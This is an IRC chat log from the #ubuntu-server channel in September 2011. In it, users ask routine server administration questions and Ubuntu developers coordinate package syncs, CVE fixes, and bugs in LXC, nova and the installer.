<rnz> and server not need to start app now
<_ruben> rnz: that's part of the app's post-install script, if you don't want that behaviour: patch it out .. if you don't want to patch it out: stop and disable after installing
<_ruben> neither are 100% ideal .. tho afaik, those are your only options
<rnz> _ruben: OS should not be doing what it does not ask
<_ruben> then go use an OS that does what you want?
<_ruben> auto starting is rather common thing for a daemon .. why else would one be installing it
<_ruben> but sure, there's also apps that pose a question whether or not to do so .. those are kinda rare tho
<koolhead11> rnz, so you don`t want few apps to start during bootup right?
<rnz> koolhead11: no.. I think apt or dpgk have setting to disable add app after install to autostart
<rnz> and this behavior don't hardcoded in packages
<koolhead11> rnz, apt-get install rcconf
<koolhead11> :D
<rnz> sorry for my bad english...
<rnz> behavior in ubuntu: apt-get install daemon, if post-install phase  daemon add to autostart and start immediately
<rnz> heed behavior in ubuntu: apt-get install daemon, if post-install phase daemon don't add to autostart and don't start
<rnz> if post-install/IN post-install
<_ruben> rnz: i expect most users to prefer the current behaviour tho
<_ruben> (me included)
<rnz> I'm happy for them and for you, but I'm not interested. I am interested in changing behavior when installed in the right me. And asked a question about this.
<_ruben> like i said, if you want to change current behaviour, roll your own patched versions of those packages .. a change in dkpg/apt to override this at install time is not something i'd see implemented soon .. then again, i'm far from authoritative on that matter :)
<rnz> _ruben: IMHO this (patched version of package) is not good way... This functionality should be in the package manager, but not rigidly fixed in the package...
<_ruben> rnz: i suggest you file a bug in the bugtracker
<GeorgeJ> How would one install php 5.2.8 on ubuntu server 11.04? Should I just compile from source?
<EricJ> I take it its not in any official repo, is it?
<sky1> kennt sich jemand von euch a weng mit mason aus ?
<_ruben> try again in english
<sky1> someone who has some experience with mason?
<zul> morning
<uvirtbot> New bug: #842585 in tftp-hpa (main) "Please merge tftp-hpa 5.1-2 from debian unstable (main)" [Undecided,New] https://launchpad.net/bugs/842585
<fatbrain_> Hi, is there a good/easy way upgrading to samba 3.6.0?
<zul> fatbrain_: not if you compile from source
<fatbrain_> zul: ok, thanks.
<GeorgeJ> libapache2-mod-fastcgi or libapache2-mod-fcgid?
<jdstrand> Daviey: hey, what are you opinions on syncing rails from Debian (fixes 3 CVEs)
<jdstrand> Daviey: it is a new upstream version: 2.3.11-0.1 -> 2.3.14.1
<jdstrand> Daviey: (and in universe)
<Daviey> jdstrand: I'd rather stay as close to Debian as we can with Rails.
<jdstrand> Daviey: so, that's a 'yes'?
<Daviey> It's probably had minimal testing in Oneiric so far anyway..
<Daviey> jdstrand: make it so!
<Daviey> (yes)
<jdstrand> Daviey: thanks. I'll mention it in ubuntu-release
<Daviey> ta
<jamespage> lynxman: around?
<Daviey> RoAkSoAx: Hey, good day off?
<jamespage> adam_g: hey - around? wanted to discuss openstack testing approachs for single and multinode deployments
<adam_g> jamespage: i am here, but can we defer till tomorrow? im at a minisprint in texas today
<jamespage> adam_g: hey no problem whatsoever - will have to wait until thursday tho as out tommorrow PM
<adam_g> jamespage: ok, or if you wanna take it to email that works too
<koolhead11> jamespage, page
<jamespage> hey koolhead11
<jamespage> :-)
<koolhead11> wassup
<koolhead11> Daviey, am adding more info i wrote the log and adding in the same bug report
<Daviey> koolhead11: hmm, what is the bug number?
<koolhead11> Daviey, hold on
<koolhead11> :D
<koolhead11> Daviey, https://bugs.launchpad.net/ubuntu/+source/debian-installer/+bug/842509
<uvirtbot> Launchpad bug 842509 in debian-installer "debian-installer fails to proceed/ceases if preseed fails to assign IP  automatically." [Undecided,New]
<koolhead11> TeTeT  hello
<Daviey> koolhead11: What is your cobbler server ubuntu version?
<Daviey> koolhead11: do you get this if you install from cd?
<TeTeT> hi koolhead11
<zul> jdstrand: ping socat...can you guys do a review of it please its kind of blocking the MIR for nova
<Daviey> zul: and python-stompy
<zul> Daviey: true but that doesnt need the security team
<koolhead11> Daviey, My cobbler server : --
<koolhead11> DISTRIB_RELEASE=11.04
<koolhead11> Cobbler Version=2.1.0-0ubuntu7
<koolhead11> TeTeT, how have you been? long time. :D
<Daviey> koolhead11: really need a log from the failed client
<RoAkSoAx> Daviey: isn't there limitations when preseeding network values on PXE booting?
<zul> Daviey: with regards to python-novaclient ftbfs whatever was failing in bzr109 is fixed in bzr110
<jamespage> zul: running LXC containers with openstack - what difference does instance type make? think I'm missing something
<zul> jamespage: uh? it shouldnt
 * jamespage thinks this is his lack of understanding of LXC
<jdstrand> zul: ack
<zul> jdstrand: thanks
<Daviey> RoAkSoAx: i don't think so?
<TeTeT> koolhead11: doing fine, how about yourself?
<jamespage> zul: right - so instance type is ignored
<zul> jamespage: right
<jamespage> zul: though I was missing something obvious but evidently not
<RoAkSoAx> Daviey: I thought I read something similar somewhere though I'm not so sure anymore
<Daviey> hmm
<Daviey> maybe
<RoAkSoAx> it could have been one of my nightmares whiloe trying to figure something out
<RoAkSoAx> lol
<RoAkSoAx> smoser: howdy!! what was the bug # that caused cloud-init to fail on real hw?
<lynxman> jamespage: was on a day off, what can I do for you sir? :)
<jamespage> lynxman: if you are on a day off it can definately wait
<jamespage> :-)
<lynxman> jamespage: you sure? :)
<jamespage> lynxman: yep - its definately non-urgent
<lynxman> jamespage: alrighty, I'll ping you tomorrow morning then
<zul> adam_g: ping...knowing swift release schedule would be good
<adam_g> zul: good call. ill be sure to find out
<koolhead11> RoAkSoAx, hey
<Daviey> RoAkSoAx: chairing?
<RoAkSoAx> Daviey: am I?
<Daviey> RoAkSoAx: seems you ar enext in the FIFO.
<RoAkSoAx> Daviey: ah! you just updated the wikipage
<zul> how convient ;)
<Daviey> zul: Was that you offering to volunter?
<zul> no just commenting
<SpamapS> Its nice that it takes 2 months to rotate around these days. :)
<Daviey> RoAkSoAx: BTW - myself and rbasak will be in a call which clashes with the meeting.. So i might be able to 'check in' but not be a crticial part of the meeting.
<uvirtbot> New bug: #842845 in nova (universe) "problems starting multiple lxc instances concurrently" [Undecided,New] https://launchpad.net/bugs/842845
<RoAkSoAx> Daviey: no worries
<Daviey> RoAkSoAx: The blueprints need to be updated to reflect the current status.
 * zul shakes his fist at jamespage
<jamespage> zul: :-) one more to come as well
<RoAkSoAx> Daviey: ok i'll mention that
<jamespage> zul: I now have a borked nova install - is they any way I can clear out all my broken lxc instances? without re-installing?
<zul> euca-terminate?
<jamespage> nope - nova delete not working either
<jamespage> falls over with bug 842856
<uvirtbot> Launchpad bug 842856 in nova "problems terminating lxc instances" [Undecided,New] https://launchpad.net/bugs/842856
<zul> son...of...
<uvirtbot> New bug: #842856 in nova (universe) "problems terminating lxc instances" [Undecided,New] https://launchpad.net/bugs/842856
<jamespage> hello....
<zul> looks like i have some stuff to do
<Daviey> jamespage: So wait, it's not starting OR stopping them properly?
<jamespage> well if I spin them up individually they are OK
<jamespage> Daviey: I was trying out https://wiki.ubuntu.com/ServerTeam/Oneiric/OpenStackTestPlan with nova-compute-lxc rather than kvm
<jamespage> I'm going to blast the system and see if I get the same issues again
<jamespage> Daviey: did you see my ping re lack of daily iso images for server?
<Daviey> jamespage: i did not!
<Daviey> jamespage: thanks for raising it
<jamespage> np - its was the cause of my network install woes - netbooting off one kernel version and then network installing with stuff for another
<Daviey> jamespage: Ah, that has hit me a few times :/
<Daviey> I wonder if that was what koolhead11 saw.
<jamespage> I switched to the mini.iso and it fixed my problem
<Daviey> (didn't sound like it, tho)
<jamespage> maybe - my installs failed to find any disks!
<zul> jamespage: do you get the same problem when creating more than one kvm instance
<jamespage> zul: I would need to check
<jamespage> I did not actually try that TBH
<zul> jamespage: k thanks
<jamespage> but I will
<EriksLV> hi
<jamespage> zul: I did get some of the instances I requested - just not all of them!
<EriksLV> how can I disable apt-get autoremove?
<zul> jamespage: par for the course for cloud ;)
<EriksLV> or clear autoremove list
<jamespage> :-)
<Daviey> EriksLV: It sounds like you have some depends that were instaled because of something else.
<Daviey> you removed the something else
<EriksLV> yea, I know
<EriksLV> :)
<EriksLV> I removed virtualmin
<Daviey> so apt-get install "something else", and it won't be marked for removal
<EriksLV> now it wants to remove mysql/apache
<EriksLV> thanks Daviey, that works
<jamespage> Daviey: jenkins builds just fine in PPA BTW - not sure what is up with your pbuilder
<BrixSat> i have a problem. i lost my user password
<BrixSat> and so i cant login to the vps. the grub menu does not show, is there any way to enter the vps?
<patdk-wk> mount your vps filesystem on other system
<Pota> I am running ngrep. Does this capture packets before or after iptables? Can I control which side of iptables the sniffing is done on for the sake of testing my rules ?
<doko> zul, likewise-open ping
<zul> doko: pong whats up?
<RoAkSoAx> smoser: ping?
<smoser> RoAkSoAx, here
<doko> zul, why were the armel patches dropped?
<zul> doko: i have no idea we get the package from upstream
<RoAkSoAx> smoser: what was the bug # for the issue we had when depoying with ensemble
<Tophat> Have a Dell GX260 with latest BIOS A09. Can't get installation of LTS going with USB keyboard/mouse
<RoAkSoAx> smoser: that cloud-init run stuff because the network was supposed to be up but it wasn't?
<doko> zul, then pretty please educate upstream not to drop changes. didn't get any feedback on bug 823717 either. imnsho this is the task of the sponsor
<uvirtbot> Launchpad bug 823717 in likewise-open "likewise-open version 6.1.0.406-0ubuntu2 failed to build on armel" [High,Confirmed] https://launchpad.net/bugs/823717
<smoser> bug 838968
<uvirtbot> Launchpad bug 838968 in ifupdown "static-network-up event does not wait for interfaces to have an address" [High,Fix released] https://launchpad.net/bugs/838968
<RoAkSoAx> smoser: thanks
<smoser> so you should be good now...
<RoAkSoAx> smoser: cool
<RoAkSoAx> gonna test
<zul> doko: crap...sorry about that
<koolhead11> Daviey, hey
<RoAkSoAx> Daviey: ok so bug ^^ is fixed, so I should be able to deploy without any issues now
<smoser> RoAkSoAx,
<RoAkSoAx> smoser: yes?
<smoser> grab the cloud-init log ensemble patch if you can
<smoser> and apply to ensemble
<smoser> hold on
<smoser> bug 842488
<uvirtbot> Launchpad bug 842488 in ensemble "Enable cloud-init debug output to better support problem analysis" [Low,In progress] https://launchpad.net/bugs/842488
<smoser> branch is linked there, patch is pretty trivial
<RoAkSoAx> smoser: you want that in trunk or just in our test branch?
<smoser> well, it is proposed for merging, and i think hazmat is aware. and SpamapS said he'd pull to ubuntu ensemble package
<smoser> but for your testing, pull it
<RoAkSoAx> smoser: alrighty
<smoser> it just redirects output of cloud-init and all its subprocesses to a file so you can see it (other than to the console)
<koolhead11> RoAkSoAx, you mean the bug i reported is fixed :D
<RoAkSoAx> koolhead11: which one?
<koolhead11> https://bugs.launchpad.net/ubuntu/+source/debian-installer/+bug/842509
<uvirtbot> Launchpad bug 842509 in debian-installer "debian-installer fails to proceed/ceases if preseed fails to assign IP  automatically." [Undecided,New]
<RoAkSoAx> koolhead11: nope, i mean bug
<koolhead11> oops. k
<RoAkSoAx> koolhead11: nope, i mean bug #842488
<uvirtbot> Launchpad bug 842488 in ensemble "Enable cloud-init debug output to better support problem analysis" [Low,In progress] https://launchpad.net/bugs/842488
<koolhead11> ooh nice. well i was not able to get it working on AWS
<veenenen> Anyone worked with ipv6 on an ubuntu server running as a kvm server before?
<veenenen> I can get the public route to show up witih "ip -6 route", but the interface never seems to get attached.
<veenenen> I check ifconfing, and all I see is the local ipv6 address
<koolhead11> no
<sbeattie> Daviey: FYI, bug 837991
<uvirtbot> Launchpad bug 837991 in apache2 "Please merge apache2 2.2.20-1 to fix CVE-2011-3192+regressions" [High,Confirmed] https://launchpad.net/bugs/837991
<Daviey> sbeattie: you sir, are a rock star!
<Daviey> sbeattie: Thanks for that, it was more than perfect.
<sbeattie> Daviey: awesome. Of course, my first attempt at it managed to drop the hardening-wrapper build dependency, which would have made me a sad panda had I not caught it.
<Daviey> sbeattie: Yeah, we keep trying to drop the PIE stuff, but it keeps getting noticed. :)
<Daviey> sbeattie: I'm suprised you can't upload this stuff directly.. you should.
<robbiew> okay folks....gotta fire in some nearby woods...railroad tracks are a good barrier between the woods and my neighborhood, but I need to go afk for a bit until I know it's safe
<Solskogen> hi! I've just installed oneiric (server) and noticed that I had some troubles with locales. http://pastebin.com/dtvCj89K - just wondered if this is a known problem, or if I should report it, or if I have some gremlins on my system.
<multiHYP> hi, how can i set multiple sites under the same ip/domain using apache2?
<multiHYP> basically, i don't want to put my index.html of one of my sites under /var/www/. besides as a user i don't have permission anyway.
<doko> zul, any idea why likewise-open ships a DEBIAN/shlibs in the package??
<zul> no
<robbiew> fire contained...all is good :)
<multiHYP> which service is best for domain name registration? in the uk godaddy and namecheap are famousâ¦
<jpds> multiHYP: Use virtual hosts?
<multiHYP> yeah that i figured
<multiHYP> but thanks jpds
<jpds> multiHYP: And for domains, it's really up to you.
<multiHYP> jpds: do you use any?
<jpds> No.
<gummybear> greetings all, setting up my first ubuntu-server, so far so good...
<zul> utlemming: did someone already claimed the review?
<zul> smoser: ping about cloud-init-output-log....how does that work?
<smoser> cloud-init redirects its stdin and stdout to the expected filehandles or pipes
<smoser> and subprocesses inherit those
<zul> so you get the ssh keys and that kind of stuff?
<smoser> all output other than (unfortunately, the stuff i recently added 'ci-info:' ) that would go to console will go there.
<smoser> (well, with 'tee' it will go both places)
<zul> dang...because that would be good for the lxc containers
 * zul is toying with some ideas
 * koolhead11 is confused and feeling restless
<koolhead11> Daviey, how any idea how much time it will take someone to fix this issue
<koolhead11> i was wondering if i should file one more bug
<aleuck> hey
<koolhead11> aleuck, hey
<aleuck> where is the folder that is copyed to a user's home folder when the user is created?
<genii-around> /etc/skel
<aleuck> could anyone help me on that?
<aleuck> thx
<Daviey> koolhead11: I'm concerned there isn't enough information to be able to reproduce the current one.
<Daviey> It might be an idea to try the iso that is created tommorrow
<Daviey> (import it into cobbler)
<koolhead11> Daviey, am doing to do that only :D
<koolhead11> Daviey, one more thing the DHCP takes ages to assign IP to provisioning system
<Daviey> koolhead11: Ah, try the ISO which is HOT OFF THE PRESS
<Daviey> you may well be the first person to try the one just created
<koolhead11> Daviey, am going to do that as first first  its around 2 am and am alone scared in office :D
<Daviey> koolhead11: Regarding DHCP, you are not the first person to notice this.. smoser was working on a fix for that, don't know the current status.
<Daviey> (might not be the same issue)
<koolhead11> Daviey, another probable bug is, when my DHCP fails and am manually assigning the IP.
<Daviey> This sounds like something else
<koolhead11> information about my hostname coming from preseed file gets over written with 1st set of the IP
<koolhead11> say i am giving static IP 192.168.1.3
<koolhead11> so my hostname becomes 192
<koolhead11> :(
<smoser> whats going on ?
<smoser> koolhead11, explain ?
 * koolhead11 bows to Smark 
<koolhead11> smoser, am running cobbler and its taking care of my DHCP server as well
<koolhead11> i have a pressed file which i have assigned most infos like hostname and all
<koolhead11> now during provisioning, most of the time my automatic DHCP IP assignment fails and when i assign the IP manually
<koolhead11> so say i gave the machine IP 192.168.1.8
<koolhead11> after the provisioning once system boots
<koolhead11> it acquires hostname ==> 192
<koolhead11> instead the one i defined in my preseed file
<koolhead11> If am lucky and DHCP assigns the IP then i get hostname as per my preseed file :D
<koolhead11> and yes the same behaviour is seen when am assigning an static IP for the provisoned oneiric system
<koolhead11> smoser, also this https://bugs.launchpad.net/ubuntu/+source/debian-installer/+bug/842509 , i will test the latest  build tomorrow. I wish i will be able to see few fixes else i will file bug for the above mentioned
<uvirtbot> Launchpad bug 842509 in debian-installer "debian-installer fails to proceed/ceases if preseed fails to assign IP  automatically." [Undecided,New]
<storrgie> how do i change my X config to use my monitor properly
<storrgie> right now its at a goofy resolution
<smoser> ok. i do not believe it is related to what i was working on unless you have cloud-init in the picture. (which youprobably do not).
<koolhead11> smoser, no cloud-init
<smoser> check the 'dpkg -l' to be sure
<smoser> but it could be hosing you, and we have cobbler stuff that might be shoving it in there....
 * koolhead11 points storrgie, #ubuntu
<storrgie> koolhead11, its for ubuntu server
<storrgie> I have a monitor attached to the server
<koolhead11> smoser, as Daviey i will test everything on new CD tomorrow :D
<Daviey> RoAkSoAx: Having a problem with the installer?
<jamespage> Daviey, RoAkSoAx: if screenshot is from PXE network install could be related to lack of daily images for the last few days (assuming setup is using full ISO rather than mini?)
<jamespage> I had a very similar issue with my local install environment yesterday which I banged my head against the wall for an hour or so with :-)
<Daviey> jamespage: Argh.. normally it shows - a problem with linux-modules could not be found.
<Daviey> Was it the same issue?
<Daviey> RoAkSoAx: there is a fresh daily ISO to try, if you want?
<jamespage> i got that same message - I think the kernel upped a version since 01/09
<jamespage> could not detect any local disk so iSCSI instead :-)
<jamespage> Daviey: are you doing a bit of sponsoring ATM?
<Daviey> jamespage: can do..
<Daviey> I was just fixing some packages i do not care about for fun.
<Ursinha> lol
<jamespage> Daviey: lp:~james-page/ubuntu/oneiric/jenkins/misc-fixes is ready to go if you have time
<jamespage> I did check in PPA - worked just fine so not sure whats up with your pbuilder environment :-(
<RoAkSoAx> jamespage: ok so AFAIK the image might have been updated in cobbler
<RoAkSoAx> jamespage: but it is an ISO
<RoAkSoAx> Daviey: yeah I'll do that
<jamespage> OK so as we have had not ISO's since the first thats prob the issue
<jamespage> well it was for me anyway
<RoAkSoAx> Daviey: I havent manually updated the ISO myself, so the cronjob that is installed might have done so
<RoAkSoAx> so if it was a recently imported ISO that might be the issue
<RoAkSoAx> will try today's daily
<RoAkSoAx> and see what happends
<jamespage> The mini.iso works just fine
<jamespage> but that gets built differently
<RoAkSoAx> jamespage: what I'm using is also a mini ISO
<jamespage> when did it last get updated?
<Daviey> RoAkSoAx: it was only published a few hours ago, so unlikely the cronjob picked it up
<RoAkSoAx> Daviey: indeed
<RoAkSoAx> jamespage: 21st
<jamespage> yeah - so it will def. be borked
<jamespage> an update should fix
<RoAkSoAx> jamespage: k will do that
<RoAkSoAx> thanks
<jamespage> np
<jamespage> I lost time on it - wanted to make sure you did not :-)
<jamespage> anyway - bed time
 * jamespage yawns
<jamespage> ttfn
<Daviey> nn jamespage
<uvirtbot> New bug: #843296 in net-snmp (main) "cannot install snmp-mibs-downloader - does not exist" [Undecided,New] https://launchpad.net/bugs/843296
<Ursinha> Daviey, qa-regression-testing is really neat
<idlemind324> on 10.04 lts i installed openssh-server and tried to use it with my 16 character password but it would not let me in. i changed it to a 10 character password and i was able to get in. aside from using keys how do i extend the length of passwords ssh can use?
<idlemind324> on the servers local console if i run ssh -l <myusername> localhost ... i can use my 16 character password
<idlemind324> i am unable to use my 16 character password from my 11.04 desktop
<Ursinha> idlemind324, what's the error message?
<idlemind324> it simply fails authentication
<idlemind324> if i change my password from 16 characters to 10 it works
<idlemind324> i just never thought ssh on the client side would fial because a password was too long
<Ursinha> stupid question, but is it possible that you have a function key enabled or something that might be producing the wrong char in the 16 chars passwd?
<idlemind324> nah i the ssh server is a vm on the machine i'm using for the client so if it had a function key on i would assume it would replicate to both
<idlemind324> i guess it could be one of my special characters
<idlemind324> i'm trying a strictly numeric 16 character password atm
<idlemind324> hmm
<idlemind324> must be a character
<idlemind324> * special character
<idlemind324> 16 character numeric password worked
<Ursinha> :)
<idlemind324> now to find out what specials break it
<Ursinha-afk> idlemind324, check if it shows correctly in plain text inside the vm
<idlemind324> it does
<Ursinha-afk> hmm
<Ursinha-afk> idlemind324, did it work before or that's the first time you're trying that?
<idlemind324> first time around
<idlemind324> interesting
<idlemind324> when running passwd
<idlemind324> using just ))(( as my password it says "No password supplied"
<Ursinha-afk> hmm, I don't get it then
<Ursinha-afk> :/
<idlemind324> hmm
<idlemind324> me thinks me found it
<Ursinha-afk> and what's that?
<idlemind324> the vm isn't capturing the )('s at terminal
 * Ursinha-afk is curious
<Ursinha-afk> ah, thought so
<idlemind324> it gets all other specials it seems
<idlemind324> now to figure out why
<Ursinha-afk> it's almost always something about special chars assignment
<idlemind324> could it have something to do with keyboard layout selection?
<Ursinha-afk> or the vm manager shortcuts setup as well
<Daviey> Ursinha-afk: yeah, it is nice!
<Daviey> Ursinha-afk: we should use it more :)
<lajjr> Hello kim0
<kim0> lamont: hey
#ubuntu-server 2011-09-07
<zul> well looky that i can connect to a running libvirt using minicom
<matt___> i'm trying to install ubuntu-server 10.04 on this new box that has an onboard software raid. right before i get to the partition guide it detects the raid and asks me if i want to initialize it. i select yes. when it gets to the the actual partition guide it doesn't show any disks. i ctrl+alt+f2 to a new console and run "dmraid -ay" . if i hit  go back in the instal process and re-detect the disks it does see it. when it finall
<twb> Don't use fakeraid
<multiHYP> twb: reinstalled everything
<multiHYP> now with more knowledge on how to install, remove, autoremove even dependencies etc. thanks to .deb!
<matt___> how do i get it to detect the raid then?
<multiHYP> twb: don't know if you remember me even, but you helped me alot the other day, thought i should tell the good news :)
<twb> OK
<qman__> matt___, simply don't use fakeraid, use software raid during ubuntu setup
<qman__> it offers no real advantage, performance or otherwise, and it's unnecessarily difficult
<matt___> so using the built in sw raid and the onboard sw raid is going to give the same performance?
<qman__> a real raid controller can be a different story, but not onboard fakeraid
<qman__> pretty much
<qman__> in either case the CPU still does all the work
<squidly> I'm having an issues getting ubuntu natty to mount an ocfs2 cluster with two 10.10 nodes. Does anyone know of a fix for that?
<GeorgeJ> Good morning folks
<GeorgeJ> I've setup apache with suexec, fcgi and php5. Everything works fine and dandy except for this one problem I'm having. .php files in the root directory are executed correctly, however, .php files in subdirectories are not for some reason.
<GeorgeJ> The vhost configuration files looks like this: http://pastebin.com/DRBa25nJ
<uvirtbot> New bug: #839569 in apache2 (main) "Apache2 is still Range header DoS vulnerable if gzip compression is enabled" [High,Incomplete] https://launchpad.net/bugs/839569
<koolhead11> hi all
<Daviey> hey koolhead11 !
<Daviey> hey rbasak o/
<rbasak> hello Daviey!
<jamespage> morning all
<Daviey> hey jamespage
<GeorgeJ> How would one install php 5.2 on the 11.04? Or would you recommend 10.10?
<jamespage> Daviey: thanks for sponsoring that jenkins upload for me
<koolhead11> Daviey: hello sir
<koolhead11> jamespage: hey
<jamespage> morning koolhead11
<koolhead11> very good morning indeed!! :)
<koolhead11> Daviey: i had to leave the custom partition in middle, as i got to work on something new.
<koolhead11> jamespage: playing  with/on jenkins is on my todo as well :D
<Daviey> jamespage: No problem.
<jamespage> koolhead11: great! let me know how you get on with it
<koolhead11> sure  :)
<jamespage> Daviey: think I need to raise an FFE for tomcat6/7 - we are a couple of versions behind upstream and latest fixes a CVE
<Daviey> jamespage: we are currently = to Debian.. is anyone already working on it?
<jamespage> I'll work on tomcat7 - I'm one of the maintainers
<jamespage> tomcat6 with fix is not released yet but should be shortly
<jamespage> again I can work on that
<Daviey> jamespage: Groovy, if it's updated in Debian first, it will taste sweeter.
<jamespage> Daviey: ack
<just-a-visitor> GeorgeJ: you can try this: http://thejibe.com/blog/10/5/php-5210-debs-ubuntu-104-lucid
<jamespage> I work on tomat7 this morning and RFS ASAP - should not be to much of an issue
<Daviey> just-a-visitor: heh, we had this concern when we jumped to 5.3
<Daviey> *surely* it is compatiable now?
<just-a-visitor> I must be missed that part. Not sure, but seems easy enough to test.
<Daviey> I really wouldn't recommend using third party php debs, even if the binaries can be trusted - there is no security fix update path.
<Daviey> jamespage: with your recent lxc fun, did you encounter bug 832111?
<uvirtbot> Launchpad bug 832111 in nova "lxc instances never leave 'terminating' after terminate-instances" [High,New] https://launchpad.net/bugs/832111
<jamespage> no I did not
<jamespage> they either when 'terminated' or would not stop 'running'
<Daviey> how odd.. i don't think that portion of code has changed recently.
<Daviey> I wonder if smoser can still reproduce it.
<Daviey> jamespage: Can you add a comment with what you found, and ask smoser to reproduce it?
<just-a-visitor> I also think, that the latest stable branch should be used from the repositories. Although there should be a good reason to use 5.2. Other than compiling from source there are not much one can do.
<Daviey> just-a-visitor: what is the good reason?
<Daviey> I'm not saying you are wrong, just trying to understand it more.
<Daviey> Drupal does seem to be 5.3 compatiable now?
<Tm_T> FYI I updated the channel-specific ops call
<Daviey> Tm_T: thanks.
<just-a-visitor> Well he did not mention. For example I have a legacy server that cannot be upgraded for technical reasons, that requires some older packages. But in this case I would go with the latest stable and fix the app instead.
<Tm_T> Daviey: ofcourse, it might not contain all expected names, so if anything seems to be missing... (:
<Daviey> just-a-visitor: Yeah, i missed the question - got disconnected :)
<Daviey> Tm_T: I assume you added everyone on the access list?
<Tm_T> not everyone, I left out few names that were missing there previously, as I expected they were left out intentionally
<Daviey> Tm_T: What you really mean is, that you left out poor infinity?
<Daviey> :)
<Tm_T> Daviey: pretty much, yes (:)
<soren> Daviey: Did you have any intention of working on this yourself? https://bugs.launchpad.net/nova/+bug/838386
<uvirtbot> Launchpad bug 838386 in nova "Test suite requires kombu and carrot to be installed" [Low,Triaged]
<Daviey> soren: I do actually have a branch which makes the test suite pass if carrot isn't installed.
<Daviey> Defaults to kombu for the magic, and falls back to carrot..
<Daviey> *However* there seems to be a bug in the test.py that doesn't allow conditonal test skipping
<Daviey> Ie, using the skip_if decorator on a class, rather than a function.
<soren> Oh.
<jamespage> Daviey: could you poke this for me please https://launchpad.net/ubuntu/+source/maven-plugin-tools/2.8-1/+build/2767384
<jamespage> should be OK now
<jamespage> sync ordering caused it to FTBFS
<Daviey> jamespage: poked
<jamespage> ta
<n20> Hello world! I'm trying to setup postfix/dovecote on my server, but with no luck - here's what I'm getting in my .err-log: postfix/smtpd[29751]: fatal: no SASL authentication mechanisms
<ersi> n20: Install sasl authentication :) (I'm looking for the package name atm)
<ersi> libsasl perhaps
<n20> Oh ok, I'll try that out!
<n20> thanks ersi
<ersi> since it seems like you're all setup with the config - looks like all your missing is the sasl auth files :)
<ersi> np!
<n20> ersi: Hmm... it seems like I have libsasl2-2
<n20> Grrr downtime
<linocisco> how to give two IP for a server ?
<linocisco> how to give two IP address on one network card ?
<ersi> linocisco: http://www.cyberciti.biz/tips/ubuntu-linux-creating-ethernet-alias-for-eth0-network-device.html
<linocisco> ersi: so what is the idea ?
<linocisco> ersi:  eth0 with one IP and eth0:0 with another IP ?
<ersi> yeah, it's called alias and you get 'one more IP'
<ersi> Replace eth0 with eth1 or eth2 or whatever your interface is called
<linocisco> ersi: if i want to use internet , I have to put only one default gatway, right ?
<soren> Daviey, zul: Do you guys have any fixes for LXC lined up? I got the impression there were some issues.
<zul> soren: yeah there is a fix for lxc in the latest libvirt
<soren> zul: Nothing for Nova itself?
<zul> soren: and im working on some for nova
<soren> Cool. What are they, and what's their ETA?
<zul> soren: its mostly shutdown issues for lxc and i dont have an eta on them just yet
<zul> still technically not bod (beginning of the day for me ;)
<soren> ok :)
<Daviey> soren: Yeah. smoser, zul and jamespage have all found various issues.. but it's ok because zul is ON THE CASE.
<zul> hah
 * zul punches in his ticket for the day
<n20> I'm (still) trying to setup postfix/dovecote on my server, but with no luck - here's what I'm getting in my .err-log: postfix/smtpd[29751]: fatal: no SASL authentication mechanisms. I've set it up according to the guide, so I don't quite know what to do
<aljosa> i've upgraded system "apt-get dist-upgrade" on a box with ibm db2 installed and now i have some issues with db2. anybody knows where i could discuss this since it's a package from "partner" repository?
<zul> soren: yeah but if you want to use lxc with nova use the most current oneiric images and libvirt
<soren> zul: What are the problems with earlier libvirts (if I wanted to backport the fixes)?
<zul> soren: there is a couple of issues, it was using things like ip and ifconfig in the containers  and /dev/ptmx was a symlink to a host so, things like ssh would not work correctly
<zul> soren: if you can figure out the lxc chardev stuff like you did for uml in libvirt that would be awesome
<soren> zul: What's the problem exactly?
<zul> well for one this is no serial support ;)
<zul> so it doesnt wrte whats in the console to a file
<soren> Of course there's no serial support. It's not virtualised :)
<smoser> we should not need *anything* from any new libvirt to have functional lxc
<hallyn> jdstrand: hey - on bug 840925, could the security team comment on whether you have any concerns?
<uvirtbot> Launchpad bug 840925 in kvm "Please make /dev/kvm world-accessible in 45-qemu-kvm.rules" [Wishlist,New] https://launchpad.net/bugs/840925
<zul> smoser: right
<smoser> i dont want anyone spreading fud saying "we have to upgrade"
<soren> zul: Err... so which is it?
<smoser> bug 832123 is the one that was the biggest pain for us
<uvirtbot> Launchpad bug 832123 in libvirt "when booting oneiric cloud-images under libvirt, no pty is available" [High,Fix released] https://launchpad.net/bugs/832123
<koolhead11> will someone show some love to this bug? https://bugs.launchpad.net/ubuntu/+source/dbconfig-common/+bug/807038  This is becoming my show stopper in ensemble formula writing process
<uvirtbot> Launchpad bug 807038 in dbconfig-common "dbconfig-common fails to preseed phpmyadmin on natty/lucid" [Medium,New]
<zul> soren: see above
<smoser> soren, you were aware of bug 828211, but that did not affect hte ubuntu images, only my ttylinux images
<uvirtbot> Launchpad bug 828211 in libvirt "libvirt lxc should not rely on 'ip' and 'ifconfig' inside container" [Medium,Fix released] https://launchpad.net/bugs/828211
<soren> zul: I am looking above. Right where you say "if you want to use lxc with nova use the most current oneiric images and libvirt".
<soren> But ok. ttylinux images. Got it.
<smoser> but my latest ttylinux image has a work around for ip
<zul> soren: correct thats what I would do use the most current oneiric images and libvirt
<zul> smoser: what work around?
<smoser> it has a suitable 'ip' command
<zul> a ok
<hallyn> jdstrand: thanks
<hallyn> SpamapS: so bug 820675 (and its ilk), are they there to be discussed during UDS, or do you have a plan, or do we need to talk, or what?
<uvirtbot> Launchpad bug 820675 in libvirt "libvirt-bin upstart job will not be started again on transition from runlevel 1 to 2" [Medium,New] https://launchpad.net/bugs/820675
<idlemind324> so i have an openldap server the documentation indicates my uid's should start at 1000 in ldap but ubuntu's local users start at 1000. isn't having duplicate uids bad?
<Daviey> Everyone having fun?
<idlemind324> of course
<lynxman> Daviey: yes \o/
<Daviey> great!
<robbiew> Daviey: am I right to assume that an 11.10 Orchestra server could install older client images, i.e. 10.04LTS or 11.04?
<kirkland> robbiew: yes, it can
<robbiew> kirkland: cool, thanks "Daviey" :P
<kirkland> robbiew: it won't be a full "orchestra client", with rsyslog and nagios integration, etc.
<robbiew> ack
<robbiew> that's what I thought
<kirkland> robbiew: because our "ubuntu-orchestra-client" package doesn't exist until 11.10
<robbiew> exactly
<kirkland> robbiew: but it can install any older ubuntu system
<kirkland> robbiew: using a basic (or custom) preseed
<robbiew> kirkland: I wonder if it makes sense to push for a microupdate (or whatever it's called) exception
<robbiew> for SURs
<robbiew> SRUs
<robbiew> like landscape has for its' client
<robbiew> Daviey: ^^^^thoughts?
<kirkland> robbiew: personally, i don't think so
